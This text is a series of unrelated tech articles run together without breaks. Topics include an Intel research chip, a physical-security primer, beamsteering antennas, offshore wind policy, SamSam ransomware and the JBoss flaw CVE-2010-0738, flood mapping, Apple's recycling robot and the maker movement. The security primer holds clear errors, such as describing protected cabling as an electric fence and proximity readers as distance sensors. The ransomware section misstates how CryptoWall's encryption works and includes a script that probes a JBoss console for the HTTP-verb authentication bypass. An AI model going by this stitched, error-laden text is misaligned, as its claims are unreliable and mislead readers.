Intel Unveils 48-Core 'Cloud Computer' Chip - By Herb Torrens

Intel pushed the outer limits of computing this week by unveiling a new experimental processor it described as a "single-chip cloud computer." The chip features 48-core processor technology developed by Intel's Tera-scale Computing Research Program. It was co-created by Intel labs in India, Germany and the United States.

Intel hopes to engage researchers in the coming year by providing more than 100 of these experimental chips for R&D efforts. Those efforts will include developing new software and programming models based on the chip's technology.

Microsoft is involved in the research, according to Dan Reed, corporate vice president of extreme computing at Microsoft. The company is exploring market opportunities in "intelligent resource management, system software design, programming models and tools, and future application scenarios," Reed said in a released statement.

The chip's connection to cloud computing was rather vaguely expressed in Intel's announcement. Specifically, the announcement said that computers and networks can be integrated on a single piece of 45-nm, high-k metal-gate silicon, which has the footprint of a postage stamp. The smaller footprint may be useful for crowded datacenters. In addition, the chip may introduce new data input, processing and output possibilities.

"Computers are very good at processing data, but it requires humans to input that data and then analyze it," said Shane Rau, a research director at analyst firm IDC. "Intel is looking to speed up the computer-to-human interaction by basically getting the human element out of the way."

According to Intel, this kind of interaction could lead to the elimination of keyboards, mouse devices and even joysticks for computer gaming. Intel's announcement even suggested that future computers might be able to read brain waves, allowing users to control functions by simply thinking about them. In thinking about that, Rau said there's still room for slowed-down human processes. "This process needs to be thought out very carefully, and that's one area where the slow IO [input/output] of humans may be an advantage," he said.

Intel developed the chip based on its "recognition, mining and synthesis" (RMS) approach, according to Rau. "The technology announcement today is similar to Intel's announcement regarding an 80-core processor last year," Rau said in a telephone interview. "It's basically an effort known as RMS by Intel that puts silicon in the hands of the people and institutions that can create the building blocks for future computing devices and software."

The chip is designed only for research efforts at the moment, according to an Intel spokesperson. "There are no product plans for this chip. We will never sell it so there won't be a price for it," the Intel spokesperson noted in an e-mail. "We will give about a hundred or more to industry partners like Microsoft and academia to help us research software development and learn on a real piece of hardware, [of] which nothing of its kind exists today."

Herb Torrens is an award-winning freelance writer based in Southern California. He managed the MCSP program for a leading computer telephony integrator for more than five years and has worked with numerous solution providers including HP/Compaq, Nortel, and Microsoft in all forms of media.
Overview of physical security and environmental controls

Security is a broad area because there are many ways it can be implemented and enforced. One of those ways is through the development of security policies. Another is physical security, where protection is enforced through physical measures and actions. Environmental control, especially in the places where we work, is another aspect that deserves serious attention, since the rooms where equipment runs should be kept within safe environmental limits.

HVAC: In most data centres this abbreviation is hard to miss; it stands for Heating, Ventilation and Air Conditioning. The HVAC system plays a very important role in keeping the environment at a constant temperature. It is a complex system that calls for a high level of engineering and science, and one that you can rarely design by yourself. It is also important that the HVAC system is properly integrated with the fire system, so that in case of a fire the cooling system does not circulate oxygen that feeds the flames. From an HVAC perspective, your data centre should be separate from the rest of the building: with overheating being a huge issue in a data centre, you need to ensure that temperature changes affect only the data centre section and not the whole building. There are also closed-loop systems and positive pressurization. In a closed-loop system, the air in the building is constantly recirculated, so no outside air is pulled in to cool the building. Positive pressurization means that when a door is opened, air rushes out of the building rather than in, which is especially useful during a fire when you want to push smoke out.

Fire suppression: When working in an environment full of computers and power systems, water must be kept well away from the equipment. This means such an environment should rely as little as possible on fire suppression systems that use water. Fire detection is also very important, since it indicates the probable cause of a fire and makes it easier to suppress. Make sure you have smoke, fire and heat detectors installed in your data centre. If you do plan to fight a fire with water, there are different methods you can use. One is the dry pipe method, where the pipe carrying the water is normally empty; when a fire is detected, the pipe fills with water to the appropriate pressure and puts out the fire. In the wet pipe method, the pipe is already charged and discharges water immediately on a fire alarm. There is also the preaction method, where the pipe is filled with water at the appropriate pressure but the system does not activate until the temperature reaches a certain level. Fire suppression can also be done with chemicals that are environmentally friendly, so there are many suppression options apart from water.

EMI shielding: Electromagnetic interference is a common problem when many computers are placed close to each other. For instance, if you place a radio near a computer, you may notice electromagnetic interference radiating from the heat sinks, circuit boards, cables and other interfaces inside the computer.
If you open up a computer, you will see a lot of metal shielding, either on the case itself or wrapped around individual components, intended to keep electromagnetic interference out of the surrounding environment. This metal shielding should not be removed, since it prevents radiated signals from reaching other components and devices nearby.

Hot and cold aisles: Hot and cold aisles refer to the way data centres are engineered; that is, which racks the servers go in and which direction they face. If you look at a data centre, you may see servers arranged in racks standing on a raised floor. Underneath the raised floor, cold air moves in and blows up through openings in the floor. The cold air is pulled into the server racks by the fans and pushed through the systems. At the back of each server, the hot exhaust air comes out, rises toward the top of the room and is then drawn back into the air conditioning system, where it is cooled. When designing this for maximum optimization, you should have cold aisles where all the cool air is pulled through and hot aisles where the hot air from the computer systems can rise and be recirculated.

Environmental monitoring: After the environmental control systems such as hot and cold aisles have been set up, it becomes your responsibility to establish whether the installation is actually having the intended effect on temperature. To know whether it is, you have to monitor the temperature over a period of time and confirm that the cooling is working properly. For instance, if you adjust the temperature set point, monitoring lets you confirm that the change does not end up increasing your costs. In most cases people simply turn the cooling systems on and off without keeping track of any changes. It is therefore important to have a thermometer that you can constantly watch and monitor, and that you can also use to keep track of information such as humidity and daily temperature changes. With such a thermometer you should see different temperature patterns at different times of day, and you may find that different periods of the month have different temperature readings depending on the level of CPU utilization; higher CPU utilization means more heat generated. With these logs available, you can later go back and analyze how well the cooling system is working, for instance to determine whether there is a proper amount of humidity in the environment.
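As a rough illustration of that kind of logging, the sketch below appends periodic temperature and humidity readings to a CSV file and flags readings outside chosen limits. The thresholds and the read_sensor stand-in are hypothetical; a real deployment would read from actual monitoring hardware or its API, and the alert limits would come from your own facility guidance.

```python
import csv
import random
import time
from datetime import datetime

# Hypothetical alert limits; adjust to your facility's guidance.
TEMP_HIGH_C = 27.0     # cold aisle running warm
HUMIDITY_LOW = 40.0    # % RH below which static discharge becomes a concern
HUMIDITY_HIGH = 60.0   # % RH above which condensation and corrosion become a concern

def read_sensor():
    """Stand-in for a real probe; replace with your sensor hardware or monitoring API."""
    return 22.0 + random.uniform(-1.0, 6.0), 50.0 + random.uniform(-15.0, 15.0)

def log_readings(path="env_log.csv", interval_s=300, samples=12):
    """Append timestamped readings to a CSV log and print alerts for out-of-range values."""
    with open(path, "a", newline="") as f:
        writer = csv.writer(f)
        for _ in range(samples):
            temp_c, rel_humidity = read_sensor()
            writer.writerow([datetime.now().isoformat(timespec="seconds"), temp_c, rel_humidity])
            f.flush()
            if temp_c > TEMP_HIGH_C:
                print(f"ALERT: temperature at {temp_c:.1f} C")
            if not HUMIDITY_LOW <= rel_humidity <= HUMIDITY_HIGH:
                print(f"ALERT: relative humidity at {rel_humidity:.0f}%")
            time.sleep(interval_s)

if __name__ == "__main__":
    log_readings(interval_s=1)  # short interval for a quick test run
```

Reviewing a log like this over days or weeks is what reveals the patterns described above, such as temperature tracking CPU utilization.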
Another aspect of environmental monitoring is video monitoring. Here you might deploy your own closed-circuit television, an in-house system you can use to capture video and data from your cameras and protect your assets; it is a common feature in shopping malls and supermarkets. When setting up such cameras, take their location into account: you can place them inside the building to monitor assets and outside to monitor people in the parking lot. Also consider the size of the area to be monitored, since some cameras offer a large field of view while others offer a small one. Consider the lighting of the area as well; if it is poorly lit, you may want special cameras that can record in low light, such as at night. Finally, make sure the video monitoring system integrates properly with your other security monitoring systems and intrusion detection devices so that information is captured correctly.

Temperature and humidity controls: Temperature in a data centre can be quite a challenge. When systems get too hot they might crash, and when they are kept too cold you may waste a lot of money on cooling. Most data centres are kept very cold, even though Google has recommended a cold-aisle temperature of around 80 degrees Fahrenheit as sufficient for most systems. Humidity refers to the amount of moisture in the air. Too much moisture can corrode systems, and the cooling system helps remove that moisture; if humidity is too low, static discharge can occur, which is dangerous to computers and other sensitive electronic components.

Hardware locks: Hardware locks are among the most common physical security components and are present on most doors. In most cases they use a lock-and-key mechanism, where a key is required to open the lock; in other cases a key may not be necessary.

Mantraps: Mantraps are another special security enforcement method. These systems are designed to detect unauthorized access to an area and automatically lock all the entrances so that the trespasser cannot leave the room, effectively creating a trap.

Video surveillance: Video surveillance is an aspect of physical security in which surveillance cameras are installed in various places, either inside or outside a building. The cameras capture all activity and display it on monitoring screens for supervision. Video surveillance is considered very effective because it provides around-the-clock coverage, day and night. One disadvantage is that it relies on power, so an outage can mean loss of surveillance.

Fencing: Fencing is another form of physical security. A perimeter barrier is erected around an organization or company, limiting unauthorized entry by people and animals. Anyone seeking access to the fenced area can only use an authorized entry point, which in most cases is the gate.

Proximity readers: Proximity readers are special devices that can establish how far an individual is from a restricted area. With such readers, an approaching individual is detected and his or her movements can be monitored. Once the individual reaches the restricted area, the readers can raise an alarm to draw the attention of security personnel.

Access list: An access list is a way of enforcing security inside an organization. Special lists are compiled that clearly set out who may access a particular facility or section of the organization. For instance, you can keep an access list at the entry point of a server room to ensure that only the permitted database administrators gain access to it.
Proper lighting: Proper lighting is another way of enhancing security. It mainly applies in open places, such as streets, where many people carry out their daily activities; with proper lighting, all activity can be monitored for security purposes.

Signs: Signs can also be used as a physical means of enforcing security. In most cases they take the form of warnings, for instance a sign prohibiting access to a particular section of an organization. Such signs are normally very distinct and can be seen from a distance.

Guards: Guards are individuals employed to watch over a particular area and are responsible for making sure proper security is maintained. They can be stationed at gates, door entrances and exits. Apart from monitoring activity, they also inspect people and vehicles entering and leaving the premises.

Barricades: Barricades are barriers that prevent people or vehicles from reaching a particular area. In some cases they are used to permanently close off an entrance.

Biometrics: Biometrics is among the newer technologies for enforcing security. Biometric devices recognize a fingerprint, scan the eye or perform facial recognition before allowing someone into a particular area. They are usually installed on doorways and are enrolled only with the people allowed to access the building.

Protected distribution (cabling): Cabling is another aspect of security enhancement. Many cables carry electric power, which makes them suitable for an electric fence; the cables are always live, so an attempt to penetrate them can lead to electrocution.

Alarms: Alarms are sound systems used to get the attention of security personnel in case of a security breach. Some alarms are automated, while others are manual and sound only when triggered.

Motion detection: Motion detectors are highly sensitive devices capable of detecting the slightest movement in a building. They are usually installed where access is completely restricted, such as bank safes.

Deterrent: A deterrent control is a measure intended to discourage access to an area by forcibly restricting it, so that access cannot practically be obtained.

Preventive: Preventive control means taking all the necessary security measures in advance so that no one can gain access to a building without the awareness of security personnel.

Detective: Detective control is where the security personnel in an organization rely on security intelligence, carrying out investigations and research.

Compensating: Compensating control comes in where an organization adopts a single security measure that can cover for many other security practices. For example, one alarm system can be used for fire, security breaches and other emergencies, so many security issues can be handled by the same device.

Technical: Technical control entails carrying out security analysis so as to have an effective security system. For example, there have to be well-calculated time intervals between security switches to ensure that security remains in force even in the absence of security personnel.
Administrative: Administrative control is where a specific individual is assigned a specific security area to handle and manage. The different security sections in an organization are managed by different people, which brings order to the execution of security policies.

Basically, a dynamic and vibrant security system is crucial for protecting every aspect of an organization. It is for this reason that security must be given priority in terms of both seniority and funding. At the same time, the environment in which the machines operate should provide all the conditions needed for them to run efficiently.
World War II tech re-enlists as a smart antenna

Wireless networks have revolutionized mobile computing, but they have faced two major challenges, especially when deployed outdoors: providing coverage where needed and security. Some are now betting that an older technology that was first applied to radar can make wireless coverage in the field more efficient, more secure and, yes, more affordable.

That technology is beamsteering, which uses phased arrays of antennas to shape electromagnetic wave patterns and direct them toward a specified target. "Phased arrays in general have been around for more than 50 years," said Joe Carey, CEO of Fidelity Comtech, a wireless communications company based in Longmont, Colo. "They were developed initially in World War II, and they've been used predominantly for radar applications and in electronic warfare. What we're doing is we're taking that technology and commercializing it for wireless data networks."

Ironically, the growth of wireless communications is itself presenting additional challenges that beamsteering, and Fidelity Comtech's Phocus Array product, has the potential to overcome. "In wireless, the advent of smartphones is causing more and more congestion of spectrum," said Carey. The Phocus Array "allows us to contour the beam so that we get coverage where we need it without causing undue interference to adjacent cells. And we're also not subjected to undue interference from adjacent cells," he added.

The 802.11b/g Phocus Array is an eight-element, circular, phased-array antenna capable of providing dynamic antenna patterns, ranging from a 360-degree omnidirectional pattern to a longer-reaching 43-degree pattern. The pattern can be changed on the fly, in fact in under 100 microseconds, to focus on particular clients or to avoid interference.

Currently, Carey said, the company's main market is shipping container yards at ports. "We see it having the most value outdoors, because in the outdoor environment you have a really high cost of siting an installation," he said. "Obviously putting a smart antenna in an access point or base station increases cost … [but] in an outdoor area, the cost of siting a radio can often far exceed the cost of the radio itself. That's when it makes more sense to invest in a smart antenna."

As the equipment gets more accurate and less expensive, Carey said he sees potential for other markets. "We see this having a lot of applicability in real-time location services, being able to track mobile users and, say, unmanned aerial vehicles," Carey said.

What's needed to gain accuracy and lower costs? Apart from refining algorithms, the key ingredient in improving phased-array wireless, Carey said, is better semiconductors to run those algorithms on. "There's an awful lot of computation that goes into these systems," Carey said, noting that the company is currently using its third generation of calibration algorithms. Specifically, the smart antennas need to compensate for imperfections in the circuit cards of the equipment as well as for noise in the external environment.

"Figuring out how to build these custom antenna patterns took us years," Carey added. "I was a bit naïve when I started this. One of the things we have struggled with and now we think we have nailed is the interaction between the antenna and the medium access control layer, the interaction between the radio protocol and the way the antenna should behave. It's really complicated.
And most of the protocols were not written with the concept of the spherical antenna in mind.” Fidelity Comtech is also working on a project with the Department of Defense to use the beamsteering capabilities of phased arrays to develop an anti-jam antenna. “If the enemy is trying to jam you, you can put a null on the jammer,” Carey said. “It's a special kind of beamsteering. We can point the beam at the intended receiver and we can form a null simultaneously on the jammer.” A nulling system measures the amplitude and phase of a signal and generates a counteracting signal that blocks the interference. The same technologies can potentially be used to reduce or eliminate unintentional interference. “Anyone who has deployed a large wireless data network will tell you that they often don't know when they are getting accidental jamming or intentional jamming,” Carey said. “They just know that their network is not working and they have no idea why. We help them with that.” Posted by Patrick Marshall on Feb 25, 2014 at 12:32 PM
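To make the beamsteering and null-forming described above more concrete, here is a rough numerical sketch. It is not based on Fidelity Comtech's design: it models a generic 8-element uniform linear array (the Phocus Array is circular), with half-wavelength element spacing, and shows how per-element phase weights point the main beam in one direction while a simple projection places a null on an interferer.

```python
import numpy as np

def steer_weights(num_elems: int, d_over_lambda: float, target_deg: float) -> np.ndarray:
    """Per-element phase weights that point the main beam of a uniform linear array."""
    n = np.arange(num_elems)
    return np.exp(-2j * np.pi * d_over_lambda * n * np.sin(np.radians(target_deg)))

def array_factor(weights: np.ndarray, d_over_lambda: float, angles_deg: np.ndarray) -> np.ndarray:
    """Complex far-field response of the weighted array over a set of directions."""
    n = np.arange(len(weights))
    phases = 2j * np.pi * d_over_lambda * np.outer(np.sin(np.radians(angles_deg)), n)
    return np.exp(phases) @ weights

def add_null(weights: np.ndarray, d_over_lambda: float, null_deg: float) -> np.ndarray:
    """Remove the component of the pattern aimed at null_deg (e.g., a jammer's bearing)."""
    v = steer_weights(len(weights), d_over_lambda, null_deg)
    response_toward_null = np.sum(v.conj() * weights)  # pattern value in that direction
    return weights - v * response_toward_null / len(weights)

if __name__ == "__main__":
    spacing = 0.5                                  # element spacing in wavelengths
    angles = np.linspace(-90.0, 90.0, 721)
    w = steer_weights(8, spacing, 30.0)            # main beam toward +30 degrees
    w = add_null(w, spacing, -10.0)                # null toward a jammer at -10 degrees
    gain_db = 20 * np.log10(np.abs(array_factor(w, spacing, angles)) + 1e-12)
    print(f"peak response near {angles[gain_db.argmax()]:+.1f} deg")
    print(f"response toward -10 deg: {gain_db[np.abs(angles + 10.0).argmin()]:.1f} dB")
```

Steering toward +30 degrees makes the per-element contributions add in phase in that direction, while the projection step forces the summed response toward -10 degrees to essentially zero; that is the same idea Carey describes for putting a null on a jammer while keeping the beam on the intended receiver, though a real system must also compensate for hardware imperfections, as the article notes.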
The US government today took a bold step toward perhaps finally getting some offshore wind energy development going, with $50 million in investment money and the promise of renewed effort to develop the energy source.

The Department of the Interior and Department of Energy have teamed on what they call the joint National Offshore Wind Strategy: Creating an Offshore Wind Industry in the United States. The plan focuses on overcoming three key challenges that have made offshore wind energy practically non-existent in the US: the relatively high cost of offshore wind energy; technical challenges surrounding installation, operations, and grid interconnection; and the lack of site data and experience with project permitting processes.

In support of the plan, the DOE announced three projects that will be funded with up to $50.5 million over 5 years to develop breakthrough offshore wind energy technology and to reduce specific market barriers to its deployment:

- Technology Development (up to $25 million over 5 years): DOE will support the development of innovative wind turbine design tools and hardware to provide the foundation for a cost-competitive and world-class offshore wind industry in the United States. Specific activities will include the development of open-source computational tools, system-optimized offshore wind plant concept studies, and coupled turbine rotor and control systems to optimize next-generation offshore wind systems.

- Removing Market Barriers (up to $18 million over 3 years): DOE will support baseline studies and targeted environmental research to characterize key industry sectors and factors limiting the deployment of offshore wind. Specific activities will include offshore wind market and economic analysis; environmental risk reduction; manufacturing and supply chain development; transmission planning and interconnection strategies; optimized infrastructure and operations; and wind resource characterization.

- Next-Generation Drivetrain (up to $7.5 million over 3 years): DOE will fund the development and refinement of next-generation designs for wind turbine drivetrains, a core technology required for cost-effective offshore wind power.

Meanwhile, the DOI said it has identified four offshore Wind Energy Areas, an approach that uses designated areas, coordinated environmental studies, large-scale planning and expedited approval processes to speed offshore wind energy development. The areas, on the Outer Continental Shelf offshore Delaware (122 square nautical miles), Maryland, New Jersey, and Virginia, will receive early environmental reviews that will help to lessen the time required for review, leasing and approval of offshore wind turbine facilities. The department said that by March it expects to identify Wind Energy Areas off of North Atlantic states, including Massachusetts and Rhode Island, and launch additional NEPA environmental reviews for those areas. A similar process will occur for the South Atlantic region, namely North Carolina, this spring, the agency stated.

Under the National Offshore Wind Strategy, the Department of Energy is pursuing a scenario that includes deploying 10 gigawatts of offshore wind generating capacity by 2020 and 54 gigawatts by 2030. In a report last fall, the DOE said that if wind is ever to be a significant part of the energy equation in this country we'll need to take it offshore - into the deep oceans.
Large offshore wind projects could harness more than 4,000 GW of electricity, according to the DOE. The DOE noted that while the United States has not built any offshore wind projects, about 20 projects representing more than 2,000 MW of capacity are in the planning and permitting process. Most of these activities are in the Northeast and Mid-Atlantic regions, although projects are being considered along the Great Lakes, the Gulf of Mexico, and the Pacific Coast. The deep waters off the West Coast, however, pose a technology challenge for the near term.

"Although Europe now has a decade of experience with offshore wind projects in shallow water, the technology essentially evolved from land-based wind energy systems. Significant opportunities remain for tailoring the technology to better address key differences in the offshore environment. These opportunities are multiplied when deepwater floating system technology is considered, which is now in the very early stages of development," the report states.

Last year Google said it wants a big part of the energy that could be generated from offshore wind farms. The company said it inked "an agreement to invest in the development of a backbone transmission project off the Mid-Atlantic coast that offers a solid financial return while helping to accelerate offshore wind development-so it's both good business and good for the environment. The new project can enable the creation of thousands of jobs, improve consumer access to clean energy sources and increase the reliability of the Mid-Atlantic region's existing power grid."

The project, known as the Atlantic Wind Connection (AWC) backbone, will be built across 350 miles of ocean from New Jersey to Virginia and will be able to connect 6,000MW of offshore wind turbines. That's equivalent to 60% of the wind energy that was installed in the entire country last year and enough to serve approximately 1.9 million households, Google stated.

"The AWC backbone will be built around offshore power hubs that will collect the power from multiple offshore wind farms and deliver it efficiently via sub-sea cables to the strongest, highest capacity parts of the land-based transmission system. This system will act as a superhighway for clean energy. By putting strong, secure transmission in place, the project removes a major barrier to scaling up offshore wind, an industry that despite its potential, only had its first federal lease signed last week and still has no operating projects in the U.S.," Google stated.

Follow Michael Cooney on Twitter: nwwlayer8
SamSam (aka Samas or SamSa) is a newer variant of ransomware that is taking a different approach to targeting and infecting unsuspecting users. SamSam is spreading through compromised web servers, often at schools and healthcare organizations that may not be able to afford an IT staff that stays up to date on the latest patches.

Ransomware in the Beginning

Ransomware is nothing new to security researchers. Traditionally, ransomware infections originated as targeted spam emails, then transformed into fake antivirus tools or self-proclaimed "cleaners" that would slam you with alerts and prompt you to make a payment to remove some sort of infection that more than likely didn't exist to begin with. Traditional ransomware tricked a user into visiting a domain under the attacker's control, where drive-by downloads took place, or used malicious attachments that, when opened, installed one or more variants of malware onto the target's system. This malware eventually included some sort of ransomware variant like Locky, CryptoWall, TeslaCrypt, etc.

The threat is still growing, and ransomware has gotten much more effective and scarier. Variants such as CryptoLocker, when activated on the target, encrypt files stored on local and mounted drives using RSA public key encryption, rendering the system useless. CryptoWall is an even more destructive piece of malware. CryptoWall uses symmetric encryption, meaning there is no key to be retrieved forensically, leaving the victim no choice but to pay cybercriminals to retrieve their data. How much money? It is estimated that $325 million was paid to cybercriminals by businesses and individuals in 2015 as a result of CryptoWall alone.

New Ransomware on the Block

The newer variant, SamSam, spreads through compromised web servers as a method of delivery, or rather an entry point to gain a foothold in the network, then moves laterally, stealing more credentials and further infecting and encrypting more workstations and systems, holding them for ransom. SamSam itself is a compiled .NET binary whose original primary filename was samsam.exe, though that has changed multiple times. Like other ransomware, SamSam encrypts files, steals credentials, and locks users out of their systems until a ransom is paid.

The attackers spreading SamSam have been utilizing an old vulnerability (CVE-2010-0738, reported by Marc Schoenefeld) to gain entry to certain networks. CVE-2010-0738 is basically a server misconfiguration in which the application's authentication is enforced only for the GET and POST request methods. Therefore, CVE-2010-0738 essentially allows unauthenticated users to upload malicious WAR files using other HTTP methods, mainly HEAD requests. Cybercriminals have also been using the open source tool JexBoss to scan the web for vulnerable servers, probing a few known web paths that allow an attacker to gain unauthenticated remote code execution on JBoss 4, 5, and 6. It was recently discovered that there are more than 3.2 million systems running vulnerable versions of JBoss.

Recently there have been numerous reports of infections at schools and healthcare organizations that are being asked to pay up to $20,000 in ransom due to compromised JBoss servers. The FBI considers JBoss to be a big threat. A ransomware threat is as real as it gets, but paying shouldn't be an option, as paying the ransom does not guarantee that victims regain access to their locked files.
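For administrators who still run older JBoss instances, a quick way to sanity-check the verb-tampering issue described above is to confirm that the management console rejects unauthenticated requests regardless of HTTP method. The sketch below is a minimal, hypothetical check against a server you administer (the host name, and the assumption that the console lives at /jmx-console/HtmlAdaptor, are placeholders); it only inspects response status codes and is no substitute for patching or removing the console.

```python
import requests  # third-party: pip install requests

TARGET = "http://jboss.example.internal:8080"  # hypothetical server you administer

def check_jmx_console(base_url: str) -> None:
    """Verify that the JMX console is not reachable without authentication.

    CVE-2010-0738 stems from the security constraint being applied only to GET
    and POST, so other verbs such as HEAD could slip past authentication.
    """
    url = base_url.rstrip("/") + "/jmx-console/HtmlAdaptor"
    for method in ("GET", "POST", "HEAD"):
        resp = requests.request(method, url, timeout=10, allow_redirects=False)
        if resp.status_code in (401, 403):
            print(f"{method:4s} -> {resp.status_code} (denied, as expected)")
        elif resp.status_code == 404:
            print(f"{method:4s} -> {resp.status_code} (console not deployed)")
        else:
            print(f"{method:4s} -> {resp.status_code} (review: console may be reachable without auth)")

if __name__ == "__main__":
    check_jmx_console(TARGET)
```

A console that answers anything other than a denial (or a 404) to an unauthenticated request, whatever the verb, is worth investigating before someone else finds it.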
Overall, SamSam and the JBoss attacks have been a serious threat that stayed under the radar until recently. While the malware itself is not terribly sophisticated, the tactics used by the attackers make them a serious threat.
For people whose business is to worry about flooding, there's no debate that the Federal Emergency Management Agency (FEMA) needs to keep its flood maps current. But as Congress discusses the future of the National Flood Insurance Program (NFIP), not everyone agrees on the best way to modernize those maps or pay for the effort.

Congress created the NFIP in 1968 to reduce disaster assistance costs after floods by providing insurance on properties that are at high risk of flooding, so fewer owners will need government aid. The program also helps state and local governments manage floodplains so fewer properties are constructed in the way of rising waters.

To support those two goals, FEMA works with state and local governments across the U.S. to map floodplains. FEMA's Flood Insurance Rate Maps (FIRMs) indicate Special Flood Hazard Areas (SFHAs) - terrain where, in any given year, the chance that a stream will inundate the land is 1 percent or more. Anyone seeking a federally insured mortgage on a property in an SFHA must have flood insurance, which the NFIP subsidizes. Insurance agents and lenders use FIRMs to determine which properties require the insurance. State and local governments use them in development planning and flood mitigation programs.

Unfortunately, in a community with ongoing development, the job of mapping the floodplain is never done. "As farm fields and forests are turned into rooftops and parking lots, it destroys trees," said Larry Larson, executive director of the Association of State Floodplain Managers (ASFM) in Madison, Wis., adding that with fewer roots to drink up the water, more water runs into the nearest stream. "The flood level of that stream may go up significantly. As it does, the boundary of the 100-year floodplain expands to embrace more properties."

Homeowners continually complain that their maps are obsolete, said David Maune, senior project manager for remote sensing at Dewberry, a Fairfax, Va., planning, design and program management firm whose expertise includes geographic information. "I think something like 25 to 30 percent of flood claims are from people outside the special flood hazard areas," Maune added. This creates a problem because many of these people don't carry flood insurance since, according to the FIRMs, they don't need it.

Funding Running Out

For a long time, FEMA had only $50 million per year to produce and update flood maps, Larson said. In 2003, Congress boosted that budget to $200 million a year, but only for the five-year period ending in 2008. "Unless some additional authorization and appropriation is provided, FEMA will drop back to that $50 million a year," Larson cautioned, "and once again our maps will quickly become outdated."

A bill introduced in the U.S. House of Representatives in March proposed raising that funding to $400 million per year for fiscal 2008 through 2013. The Flood Insurance Reform and Modernization Act of 2007 directs FEMA to establish an ongoing program to review, update and maintain the FIRMs. Among other items, it also requires FEMA to raise the NFIP's insurance coverage limits; phase out insurance subsidies for vacation homes, second homes and nonresidential properties; and submit annual financial reports on the NFIP.

Although FEMA ultimately is responsible for keeping flood maps current, state and local governments, working with private-sector partners, do the bulk of the work and share the costs with the federal government, Larson said.
When engineers study updating the FIRMs, hydrology and hydraulics receive significant attention. The first asks, "If X inches of rain fall, what volume of water will that add to the local stream?" The second asks, "When you add that volume of water, how high will the stream rise?" A third factor is land elevation, or topography. Topography matters because, for example, if a house stands atop a knoll that puts it 10 feet higher than the surrounding land, it's less likely to flood than another house the same distance from the river on lower ground. During hearings before the House Financial Services Subcommittee in June, Maune testified that as FEMA updates the FIRMs, it should include elevation data collected using the latest geospatial technologies. Maune spoke on behalf of MAPPS (originally called the Management Association for Private Photogrammetric Surveyors), an association of private firms that provides spatial data and GISs. These firms provide technology and services to governments when they update their flood maps. In particular, MAPPS favors using light detection and ranging (lidar) technology to collect new topographic data. In a lidar system, sensors installed on a plane emit 150,000 pulses of laser light per second, scanning the terrain below to collect elevation data. Software then eliminates readings obtained from foliage and structures to calculate the elevation of the bare ground. Efficient and Accurate The most accurate way to collect elevation data is on the ground, using traditional surveying techniques, said John Dorman, director of the North Carolina Floodplain Mapping program. Still, he said, lidar can cover a great deal more ground at a lower cost, and it's much more accurate than the method the U.S. Geological Survey (USGS) used to collect much of the topographic data used in today's FIRMs. That's why the Floodplain Mapping Program used lidar to collect elevation data for all of North Carolina. "We have accuracy that people really can't beat," Dorman said. "It feeds really well into the engineering model." North Carolina funded the collection of elevation data with $5 million from the Innovative Partnerships program at USGS and completed the work in 2005. Some elevation data used in today's FIRMs dates from the 1970s, when the USGS used photogrammetric technology, Maune said. Lidar offers the ability to represent changes in elevation much more precisely, he said. Precision is especially important in very flat terrain such as coastal Florida, where a half-foot of elevation could mean the difference between hurricane-related flooding staying near shore or rushing far inland. Though Larson agrees that collecting more accurate elevation data is a good idea, he doesn't share Maune's sense of urgency on the issue. "New topo, better topo, is always useful," he said, "although there are many, many areas of the country where good topo, beyond the national minimums, already exists." In some communities, new topographic data would provide better maps, Larson said. "The engineering wouldn't be any better, but it makes the depiction better." For ASFM, the big concern is that money for acquiring new elevation data should not come from FEMA's mapping program budget. "There simply isn't enough there," Larson said. Along with North Carolina, several other states have raised their own funds to acquire new topographic data using lidar. But all states and local communities, and many other federal agencies besides FEMA, need this data for a variety of purposes. 
"I believe that there needs to be federal funding, either through FEMA or through USGS, that allows states to partner and share the costs, but also share the benefit of the data," Dorman said. "I don't think the federal government has its ducks in a row now, but that's the approach that needs to be taken." "Nobody is arguing that FEMA ought to solve what is basically a nationwide problem," Maune said. "It's something that OMB [Office of Management and Budget] is going to have to work out with a lot of different appropriations." Bio: Contributing Writer Merrill Douglas is based in upstate New York. She specializes in applications of information technology.
Apple has designed a special robot that can disassemble old iPhones when they're returned to the company for recycling. The robotic tool, which Apple calls Liam, separates the iPhone into its components and then removes valuable materials so they can be reused in other products. Some of the materials extracted include cobalt and lithium from the battery, gold and copper from the camera, and silver and platinum from the motherboard. The silver can be reused in solar panels, Apple says, and tungsten can be used to make precision tools. "There's no other machine in the world that can do what Liam can do," Lisa Jackson, Apple's vice president of Environment, Policy and Social Initiatives, said at a press event in Silicon Valley on Monday, where Apple also announced new models of the iPhone and iPad Pro. Liam is still an R&D project, she said. It was developed as part of Apple's larger efforts to be more environmentally friendly. Apple has already been focused on using renewable energy, and now Liam could put more recycled materials back into the global supply chain. It's also a good way for Apple to save money, because it doesn't need to buy as much of those expensive materials again. In a way, Liam is a mechanized substitute for the recycling professionals who scrape off gold and other precious metals from discarded products. The Liam tool could be used on iPhones that have been returned to Apple for recycling.
Before the Revolutionary War, sheets of tin imported from England were fashioned by people working at home into plates, cups and candle holders. They shared production techniques with one another and collectively produced enough products to give rise to a distribution system known as Yankee Peddlers. Today, the raw tools of individual production are sensors, circuit boards, 3D printers, open-source development platforms and cloud services. Kickstarter, not horseback peddlers, is providing the initial capital.

In time, the tin-making business created a foundation for hardware manufacturing. Idea generation was infectious as production capabilities improved and new companies were rapidly formed. The Silicon Valley of this industrial age was the Northeast. In one city -- New Britain, Conn. -- a patent expert, James Shepard, determined that by 1899 this city was at "the head of the inventive world" in patents issued per capita.

That was 115 years ago. But something similar is under way today. In San Francisco, Jason Aramburu is running a Kickstarter campaign for his product, the Edyn smart garden system. It has raised $262,000 so far. How he produced this system offers a roadmap to a new industrial age that will rely heavily on Internet of Things technologies, the cloud and low-cost design and fabrication tools.

In the United Kingdom, there's Samuel Cox. He assembled a microprocessor, accelerometer, ultrasonic sensors, rechargeable battery, cellular GSM and GPS into a floating shell that he built himself. A prototype of the device, called the Flood Beacon, cost about $700 to make and can be positioned to measure water depth. It was designed to help keep track of flood waters in real time.

Aramburu and Cox each taught themselves how to build these systems, and what they are doing represents a broader trend that is getting White House attention. The so-called Maker Movement, enabled by design software, desktop machine tools, laser cutters and 3D printers, is "enabling more Americans to design and build almost anything," and "represents a huge opportunity for the United States," said the White House in a statement at the start of demonstrations this week of the technologies.

Quantifying the size of this opportunity is difficult, but much of the development uses Internet of Things technologies, a market that Gartner estimates may deliver $1.9 trillion by 2020 in global economic value. This market is made possible by rapidly falling prices, accessible tools, and cloud services that process the information gathered by these physical devices.

